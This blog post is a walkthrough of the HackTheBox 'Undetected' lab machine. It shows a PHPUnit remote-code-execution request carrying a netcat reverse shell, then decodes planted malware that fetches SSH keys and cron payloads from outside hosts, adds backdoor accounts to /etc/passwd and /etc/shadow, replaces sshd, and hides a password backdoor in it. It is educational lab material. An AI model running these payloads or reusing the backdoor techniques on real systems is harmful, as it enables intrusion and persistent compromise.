HackTheBox: Undetected — WalkThrough - CyberSec Nerds

HackTheBox: Undetected — WalkThrough

Today, we will be doing Undetected from HackTheBox which is labeled as an medium-level box that aims at teaching package misconfigurations, binary reverse engineering and following the path of an attacker. Without further ado, let’s connect to our HTB OpenVPN network and start hacking!!!

Enumerating Open Ports

Only two ports seem to be open, Port 22 and 80.

┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ nmap -p- --min-rate=10000 undetected.htb -vvv 
Starting Nmap 7.91 ( <https://nmap.org> ) at 2022-07-24 17:25 +0545
PORT      STATE    SERVICE REASON
22/tcp    open     ssh     syn-ack
80/tcp    open     http    syn-ack
11155/tcp filtered unknown no-response
61896/tcp filtered unknown no-response
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]                                                                                                                                                                                         
└─$ nmap -p22,80 -sC -sV undetected.htb -vvv                                                                                                                                                                                                
Starting Nmap 7.91 ( <https://nmap.org> ) at 2022-07-25 09:50 +0545                                                                                                                                                                           
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2 (protocol 2.0)
| ssh-hostkey: 
|   3072 be:66:06:dd:20:77:ef:98:7f:6e:73:4a:98:a5:d8:f0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDeVJjvJKCD1dlTm7jo6sY5A6q2oWFakWfH/y6lkWB5eIeVxzQTT/XXyA2RW/Zegb7vbpculYjr6cPtbouTLqPkyi2Xzyk3Jz2jQHKi6qTcHIQL75tITJKPCag4tAAIvKpSCwT13B38TKd0KV2R8T59raCu83095p/GaLrdhwGUbuD0p+/GnN1jIsLs04V26rbPKLmMJLj7Dj/+yCo/CF88/4EQaFFC920sjln4FZ7FlVhv4mIwIb10nIsEgvsKBIGvvu4ZKKKU+Al6p8bYI50srY/plKu0RxZpKE6QGV17IC38q8CDsLWkmFr5emeIxHfvgUlYaAOruACcnru6azsJw69s2Kq/dKaz8K6PjRb9Ybf6/Ix8xGhfJ/gH6x0PhlxIKXD1M93XILJmgKRPJpzqrA6NZ+mtQwx0JFsgHHJno/TSrx00E6GPEtUPHcxOVZE0m0Y9rfd5Q8W6/eJN/Q3nMIywfHKZE1RUQOziGtud/jAOOApvrRHRO6l0riwQCK8=
|   256 1f:a2:09:72:70:68:f4:58:ed:1f:6c:49:7d:e2:13:39 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBQjfhdRHFh+eC/2RtmQwDSGmf0psHnd2uqXFyN0zdiyxvF3WCQYaxOgerNZqC0RyQjm2hW0DN6/0oim3slS8dw=
|   256 70:15:39:94:c2:cd:64:cb:b2:3b:d1:3e:f6:09:44:e8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFdnC6v7My/dt23PaoX7MGbuZ8/8KZh1O+xt4dDFvFQK
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu)) 
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Diana's Jewelry

Let’s check the website right away. It is an E-Commerce site primarily focused to sell jewelleries. I couln’t find any interesting endpoints after surfing the pages a while. Then, I came across the email contact@djewelry.htb so I added djewelry.htb to my /etc/hosts file.

The djewelry.htb is the same site that is opened with the IP alone. There’s nothing here as well except the Store that takes us to store.djewelry.htb which looks like the subdomain to place orders. But the pages are under-maintenance/migration at the moment.

Given that this website has concept of subdomains, it might have other virtual hosts as well hosted in its Apache Server. Let’s do a subdomain bruteforcing on djewelry.htb.

┌──(kiran㉿kali)-[/usr/share/seclists/Discovery/DNS]
└─$ gobuster dns -d djewelry.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     djewelry.htb
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
===============================================================
2022/07/25 10:17:22 Starting gobuster in DNS enumeration mode
===============================================================
Found: store.djewelry.htb    
                                  
===============================================================
2022/07/25 10:50:59 Finished
===============================================================

Nothing found except store.djewelry.htb that we already knew. Seems like it is time for some directory bruteforcing.

┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ ffuf -c -w /opt/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u <http://djewelry.htb/FUZZ> -e .php,.txt,.zip

        /'___\\  /'___\\           /'___\\       
       /\\ \\__/ /\\ \\__/  __  __  /\\ \\__/       
       \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\      
        \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/      
         \\ \\_\\   \\ \\_\\  \\ \\____/  \\ \\_\\       
          \\/_/    \\/_/   \\/___/    \\/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : <http://djewelry.htb/FUZZ>
 :: Wordlist         : FUZZ: /opt/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .php .txt .zip 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

images                  [Status: 301, Size: 313, Words: 20, Lines: 10]
icons                   [Status: 301, Size: 312, Words: 20, Lines: 10]
css                     [Status: 301, Size: 310, Words: 20, Lines: 10]
js                      [Status: 301, Size: 309, Words: 20, Lines: 10]
fonts                   [Status: 301, Size: 312, Words: 20, Lines: 10]
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ ffuf -c -w /opt/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u <http://store.djewelry.htb/FUZZ> -e .php,.txt,.zip

        /'___\\  /'___\\           /'___\\       
       /\\ \\__/ /\\ \\__/  __  __  /\\ \\__/       
       \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\      
        \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/      
         \\ \\_\\   \\ \\_\\  \\ \\____/  \\ \\_\\       
          \\/_/    \\/_/   \\/___/    \\/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : <http://store.djewelry.htb/FUZZ>
 :: Wordlist         : FUZZ: /opt/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .php .txt .zip 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

index.php               [Status: 200, Size: 6215, Words: 528, Lines: 196]
images                  [Status: 301, Size: 325, Words: 20, Lines: 10]
products.php            [Status: 200, Size: 7447, Words: 329, Lines: 230]
login.php               [Status: 200, Size: 4129, Words: 464, Lines: 123]
cart.php                [Status: 200, Size: 4396, Words: 470, Lines: 135]
css                     [Status: 301, Size: 322, Words: 20, Lines: 10]
js                      [Status: 301, Size: 321, Words: 20, Lines: 10]
vendor                  [Status: 301, Size: 325, Words: 20, Lines: 10]**
fonts                   [Status: 301, Size: 324, Words: 20, Lines: 10]

/vendor entry seems interesting. It’s a common convention to put files coming from various third party sources (the “vendors”) in a folder named that way. We can clearly see all the PHP packages that are installed in this server and we can get an exhaustive list inside. composer/installed.json file

Let’s use some string operations to filter out the package names and their corresponding versions so that we can poke at each of them with a hope of finding a vulnerability.

┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ cat installed.json | jq -c '.[] | [.name, .version]'
["doctrine/instantiator","1.4.0"]
["myclabs/deep-copy","1.10.2"]
["phpdocumentor/reflection-common","2.2.0"]
["phpdocumentor/reflection-docblock","5.2.2"]
["phpdocumentor/type-resolver","1.4.0"]
["phpspec/prophecy","v1.10.3"]
["phpunit/php-code-coverage","4.0.8"]
["phpunit/php-file-iterator","1.4.5"]
["phpunit/php-text-template","1.2.1"]
["phpunit/php-timer","1.0.9"]
["phpunit/php-token-stream","2.0.2"]
["phpunit/phpunit","5.6.2"]
["phpunit/phpunit-mock-objects","3.4.4"]
["sebastian/code-unit-reverse-lookup","1.0.2"]
["sebastian/comparator","1.2.4"]
["sebastian/diff","1.4.3"]
["sebastian/environment","2.0.0"]
["sebastian/exporter","1.2.2"]
["sebastian/global-state","1.1.1"]
["sebastian/object-enumerator","1.0.0"]
["sebastian/recursion-context","1.0.5"]
["sebastian/resource-operations","1.0.0"]
["sebastian/version","2.0.1"]
["symfony/polyfill-ctype","v1.23.0"]
["symfony/yaml","v3.4.47"]
["webmozart/assert","1.10.0"]

After a bit of googling, I came over this post about phpunit v5.6.2 which is vulnerable to Remote Code Execution on the server. Without further ado, I fired up the reverse shell payload using this exploit as below and listened using netcat. Luckily, it worked on the first try and gave the shell as www-data user.

┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ curl -XPOST --data '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.45 9001 >/tmp/f");' <http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php>
www-data@production:/home$ cat /etc/passwd | grep sh | grep -v ssh
root:x:0:0:root:/root:/bin/bash
steven:x:1000:1000:Steven Wright:/home/steven:/bin/bash
steven1:x:1000:1000:,,,:/home/steven:/bin/bash

Analyzing the /etc/passwd file, two users other than root are present i.e, steven and steven1. One thing to notice is that both have the same UID (1000) which is kinda weird. Looks like I have no permission to access this user’s home directory so its time for horizontal privilege escalation. After checking the files that are currently owned by the www-data user, something that sticks out is /var/backups/info.

www-data@production:/tmp$ find / -user www-data -ls 2>/dev/null | grep -v "/var/www" | grep -v "/proc" 
   131761    316 -rw-r--r--   1 www-data www-data   322453 Jul 26 11:12 /tmp/out
   131758      0 prw-r--r--   1 www-data www-data        0 Jul 26 15:11 /tmp/f
   131760    304 -rwxr-xr-x   1 www-data www-data   308257 Jul 26 09:22 /tmp/linpease.sh
   141800      4 drwx------   2 www-data www-data     4096 Jul 26 09:13 /tmp/tmux-33
   131759      0 srw-rw----   1 www-data www-data        0 Jul 26 09:13 /tmp/tmux-33/default
        4      0 crw--w----   1 www-data tty      136,   1 Jul 26 15:11 /dev/pts/1
        3      0 crw--w----   1 www-data tty      136,   0 Jul 26 09:16 /dev/pts/0
    15193      4 drwxr-xr-x   2 www-data www-data     4096 Feb  8 19:59 /var/cache/apache2/mod_cache_disk
    17565     28 -r-x--x--x   1 www-data www-data    27296 May 14  2021 /var/backups/info
      697      0 drwx------   2 www-data www-data       40 Jul 26 11:04 /run/screen/S-www-data
        5      0 drwxr-xr-x   2 www-data root           40 Jul 26 06:38 /run/lock/apache2

It seems like a binary file which need to be reversed.

www-data@production:/var/backups$ file info
info: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=0dc004db7476356e9ed477835e583c68f1d2493a, for GNU/Linux 3.2.0, not stripped
www-data@production:/var/backups$ ./info
[.] starting
[.] namespace sandbox set up
[.] KASLR bypass enabled, getting kernel addr
[-] substring 'ffff' not found in dmesg

Looking inside the file using strings info gave us a hex-encoded blob that looks something of value, let’s decode that.

[-] klogctl(SYSLOG_ACTION_READ_ALL)                                                                                                                                                                                                         
Freeing SMP                                                                                                                                                                                                                                 
[-] substring '%s' not found in dmesg                                                                                                                                                                                                       
ffff                                                                                                                                                                                                                                        
/bin/bash                                                                                                                                                                                                                                   
776765742074656d7066696c65732e78797a2f617574686f72697a65645f6b657973202d4f202f726f6f742f2e7373682f617574686f72697a65645f6b6579733b20776765742074656d7066696c65732e78797a2f2e6d61696e202d4f202f7661722f6c69622f2e6d61696e3b2063686d6f64203735
35202f7661722f6c69622f2e6d61696e3b206563686f20222a2033202a202a202a20726f6f74202f7661722f6c69622f2e6d61696e22203e3e202f6574632f63726f6e7461623b2061776b202d46223a2220272437203d3d20222f62696e2f6261736822202626202433203e3d2031303030207b7379
7374656d28226563686f2022243122313a5c24365c247a5337796b4866464d673361596874345c2431495572685a616e5275445a6866316f49646e6f4f76586f6f6c4b6d6c77626b656742586b2e567447673738654c3757424d364f724e7447625a784b427450753855666d39684d30522f424c6441
436f513054396e2f3a31383831333a303a39393939393a373a3a3a203e3e202f6574632f736861646f7722297d27202f6574632f7061737377643b2061776b202d46223a2220272437203d3d20222f62696e2f6261736822202626202433203e3d2031303030207b73797374656d28226563686f2022
243122202224332220222436222022243722203e2075736572732e74787422297d27202f6574632f7061737377643b207768696c652072656164202d7220757365722067726f757020686f6d65207368656c6c205f3b20646f206563686f202224757365722231223a783a2467726f75703a2467726f
75703a2c2c2c3a24686f6d653a247368656c6c22203e3e202f6574632f7061737377643b20646f6e65203c2075736572732e7478743b20726d2075736572732e7478743b                                                                                                    
[-] fork()                                                                                                                                                                                                                                  
/etc/shadow                                                                                                                                                                                                                                 
[.] checking if we got root
wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; wget tempfiles.xyz/.main -O /var/lib/.main; chmod 755 /var/lib/.main; echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; 
awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\\$6\\$zS7ykHfFMg3aYht4\\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> 
/etc/shadow")}' /etc/passwd; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _; 
do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt;

The script:

  • Downloads an authorized_keys file from tempfiles.xyz and saves it for root as an SSH backdoor.
  • Downloads a file, .main and saves it in /var/lib/, sets it executable, and adds it to the system crontab file to be run every minute from 3am – 4am each day.
  • Finds each user in /etc/password that has the shell /bin/bash and a UID 1000 or greater and writes a line to /etc/shadow based on it.
  • Finds each user in /etc/password with the same criteria again and this time writes their username, group, home folder, and shell to a file, users.txt.
  • It loops over the rows in users.txt creating rows in /etc/passwd for them with the “1” appended to their username, but keeping the same UID.
  • Removes the users.txt file.

It’s time to crack the hash for this steven1 user. Loaded the hash on hashcat and using the popular wordlist rockyou.txt gave us the password ihatehackers.

└─# cat hash
steven1:$6$zS7ykHfFMg3aYht4$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ2T9n/:18813:0:99999:7:::
┌──(root💀kali)-[/home/…/Documents/boxes/htb/undetected]                                                                                                                                                                                    
└─# hashcat -m 1800 hash /usr/share/wordlists/rockyou.txt --force                                                                                                                                                                           
hashcat (v6.1.1) starting...
$6$zS7ykHfFMg3aYht4$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ2T9n/:ihatehackers
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: $6$zS7ykHfFMg3aYht4$1IUrhZanRuDZhf1oIdnoOvXoolKmlwb...Q2T9n/
Time.Started.....: Wed Jul 27 10:20:56 2022, (2 mins, 30 secs)
Time.Estimated...: Wed Jul 27 10:23:26 2022, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      594 H/s (10.18ms) @ Accel:64 Loops:128 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 89088/14344387 (0.62%)
Rejected.........: 0/89088 (0.00%)
Restore.Point....: 88832/14344387 (0.62%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000
Candidates.#1....: joker4 -> hameed

Started: Wed Jul 27 10:19:37 2022
Stopped: Wed Jul 27 10:23:29 2022

After I login as steven1 user, I got steven‘s shell. This might be due the face that both user have same UID. Now I can access the userflag, it’s time for vertical privilege escalation. So, ran linpeas.sh and found interesting file /var/mail/steven which is actually an email from root@production to steven.

steven@production:~$ cat /var/mail/steven
From root@production  Sun, 25 Jul 2021 10:31:12 GMT
----<SNIP>---
To: steven@production
From: root@production
Subject: Investigations

Hi Steven.

We recently updated the system but are still experiencing some strange behaviour with the Apache service.
We have temporarily moved the web store and database to another server whilst investigations are underway.
If for any reason you need access to the database or web application code, get in touch with Mark and he
will generate a temporary password for you to authenticate to the temporary server.

Thanks,
sysadmin

Since this box is named undetected, it means that the attacker steps are not detected still. From this mail, one can suspect that something has been done with the Apache service and its files. After looking for a lot of time, I couldn’t find anything that sticks out and start searching for those files that were modified during the creation of /var/backups/info file. And found one module ./mods-available/reader.load that was modified at 17 May.

steven@production:/etc/apache2$ ls -l /var/backups/info 
-r-x--x--x 1 www-data www-data 27296 May 14  2021 /var/backups/info
steven@production:/etc/apache2$ find . -type f -newermt 2021-05-10 ! -newermt 2021-05-30 -ls 
    50834      4 -rw-r--r--   1 root     root           69 May 17  2021 ./mods-available/reader.load
steven@production:/etc/apache2$ cat ./mods-available/reader.load
LoadModule reader_module      /usr/lib/apache2/modules/mod_reader.so
steven@production:/etc/apache2$ file /usr/lib/apache2/modules/mod_reader.so
/usr/lib/apache2/modules/mod_reader.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=e26fdc45e4b6561d29af8306c2be74f35ab140bb, with debug_info, not stripped
┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ strings mod_reader.so | less
----<SNIP>---
/bin/bash
mod_reader.c
d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk
;*3$"
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
42PA
GCC: (Debian 10.2.1-6) 10.2.1 20210110
w#%
----<SNIP>---

Again using strings on this file gave one base64-encoded blob which when decoded gave something interesting. The SSH daemon binary /usr/sbin/sshd has been modified. So let’s export this binary to our machine and fire this up with ghidra.

┌──(kiran㉿kali)-[~/Documents/boxes/htb/undetected]
└─$ echo d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk | base64 -d
	wget sharefiles.xyz/image.jpeg -O /usr/sbin/sshd; touch -d `date +%Y-%m-%d -r /usr/sbin/a2enmod` /usr/sbin/sshd

Reversing the file gave us overwhelming number of functions to look at. Looking at the auth folder, auth_password looks something that attacker might have taken advantage over to insert the payload.

This is the C code for auth_password function.

/* WARNING: Could not reconcile some variable overlaps */

int auth_password(ssh *ssh,char *password)

{
  Authctxt *ctxt;
  passwd *ppVar1;
  int iVar2;
  uint uVar3;
  byte *pbVar4;
  byte *pbVar5;
  size_t sVar6;
  byte bVar7;
  int iVar8;
  long in_FS_OFFSET;
  char backdoor [31];
  byte local_39 [9];
  long local_30;
  
  bVar7 = 0xd6;
  ctxt = (Authctxt *)ssh->authctxt;
  local_30 = *(long *)(in_FS_OFFSET + 0x28);
  backdoor._28_2_ = 0xa9f4;
  ppVar1 = ctxt->pw;
  iVar8 = ctxt->valid;
  backdoor._24_4_ = 0xbcf0b5e3;
  backdoor._16_8_ = 0xb2d6f4a0fda0b3d6;
  backdoor[30] = -0x5b;
  backdoor._0_4_ = 0xf0e7abd6;
  backdoor._4_4_ = 0xa4b3a3f3;
  backdoor._8_4_ = 0xf7bbfdc8;
  backdoor._12_4_ = 0xfdb3d6e7;
  pbVar4 = (byte *)backdoor;
  while( true ) {
    pbVar5 = pbVar4 + 1;
    *pbVar4 = bVar7 ^ 0x96;
    if (pbVar5 == local_39) break;
    bVar7 = *pbVar5;
    pbVar4 = pbVar5;
  }
  iVar2 = strcmp(password,backdoor);
  uVar3 = 1;
  if (iVar2 != 0) {
    sVar6 = strlen(password);
    uVar3 = 0;
    if (sVar6 < 0x401) {
      if ((ppVar1->pw_uid == 0) && (options.permit_root_login != 3)) {
        iVar8 = 0;
      }
      if ((*password != '\\0') ||
         (uVar3 = options.permit_empty_passwd, options.permit_empty_passwd != 0)) {
        if (auth_password::expire_checked == 0) {
          auth_password::expire_checked = 1;
          iVar2 = auth_shadow_pwexpired(ctxt);
          if (iVar2 != 0) {
            ctxt->force_pwchange = 1;
          }
        }
        iVar2 = sys_auth_passwd(ssh,password);
        if (ctxt->force_pwchange != 0) {
          auth_restrict_session(ssh);
        }
        uVar3 = (uint)(iVar2 != 0 && iVar8 != 0);
      }
    }
  }
  if (local_30 == *(long *)(in_FS_OFFSET + 0x28)) {
    return uVar3;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

Looks like we need to find out the backdoor string from this code. This script below serves the purpose well for extracting the password.

import binascii

backdoor_str = 'a5a9f4bcf0b5e3b2d6f4a0fda0b3d6fdb3d6e7f7bbfdc8a4b3a3f3f0e7abd6'
backdoor = binascii.unhexlify(backdoor_str)[::-1]
print(f'Backdoor is: {backdoor}')
print(''.join([chr(b ^ 0x96) for b in backdoor]))
#--------------Reference: 0xdf.gitlab.io---------------#

After we get the root password utilizing this script, one can SSH into the server as root user and grab the system flag.

Such a nice box. Happy Hacking!!!

Kiran Dawadi

Founder of cybersecnerds.com. Electronics Engineer by profession, Security Engineer by passion. I am a Linux Enthusiast and highly interested in the offensive side of the CyberSec industry. You will find me reading InfoSec blogs most of the time.

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments